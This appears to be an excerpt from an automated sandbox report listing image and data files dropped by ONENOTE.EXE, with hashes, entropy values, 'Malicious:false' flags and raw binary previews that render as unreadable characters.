                                                                                                        Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2033
                                                                                                        Entropy (8bit):6.8741208714657
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                        MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                        SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                        SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                        SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4744
                                                                                                        Entropy (8bit):0.6499803399510959
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Ras2DdmYyf9/Uf2GBoO+SrrSX2Wf/nSXq:YpYYyfSHBoOW2dq
                                                                                                        MD5:63B805F2AB1FEDA5EE55280E45E5A082
                                                                                                        SHA1:508802712B7DA264AAB7FF9596657A18018228A5
                                                                                                        SHA-256:DAC028E52524C5DA7C28813A305EDC59C115B8B644DBA1E0931009EA31534AC5
                                                                                                        SHA-512:ADEB109096660A4348EAFCB620207FBAF34EC22DE42003C0E503690D16F963D7B7D15E1941DEB962D2FCC7E2C0B868D4185138127475983BE79AAFC99F4D0031
                                                                                                        Malicious:false
                                                                                                        Preview:./.C..vL....W"v_d.f.M..K.-.._.8!................?.....I...............................................................................................................h...........................................@{.N.].F...m.s(.........Z.Y.?..F.). .................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):95763
                                                                                                        Entropy (8bit):7.931689087616878
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                        MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                        SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                        SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                        SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):86187
                                                                                                        Entropy (8bit):7.951356272886186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                        MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                        SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                        SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                        SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55804
                                                                                                        Entropy (8bit):7.433623355028275
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                        MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                        SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                        SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                        SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
